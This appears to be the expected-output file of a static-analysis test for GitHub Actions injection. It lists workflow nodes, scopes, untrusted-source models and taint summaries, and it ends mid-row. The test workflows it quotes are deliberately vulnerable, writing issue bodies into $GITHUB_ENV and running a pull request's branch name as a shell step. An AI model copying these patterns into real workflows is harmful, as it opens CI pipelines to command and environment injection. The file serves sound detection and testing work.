| cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:5:5:9:2 | .github/workflows/shell.yml@5:5:9:2 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:9:9:2 | .github/workflows/shell.yml@7:9:9:2 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:8:14:8:31 | .github/workflows/shell.yml@8:14:8:31 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:10:5:14:2 | .github/workflows/shell.yml@10:5:14:2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:9:14:2 | .github/workflows/shell.yml@12:9:14:2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:14:12:23 | .github/workflows/shell.yml@12:14:12:23 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:15:5:19:2 | .github/workflows/shell.yml@15:5:19:2 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:9:19:2 | .github/workflows/shell.yml@17:9:19:2 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:18:14:18:23 | .github/workflows/shell.yml@18:14:18:23 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:20:5:22:32 | .github/workflows/shell.yml@20:5:22:32 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:22:9:22:32 | .github/workflows/shell.yml@22:9:22:32 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:14:22:31 | .github/workflows/shell.yml@22:14:22:31 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | +| peter-murray/issue-body-parser-action | * | output.* | text | manual | +| peter-murray/issue-forms-body-parser | * | output.payload | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | +| tim-actions/get-pr-commits | * | output.commits | text | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | +| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | manual | +summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| AsasInnab/regex-action | * | input.search_string | output.first_match | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_first | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_json | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | +| actions-ecosystem/action-regex-match | * | input.text | output.* | taint | manual | +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | 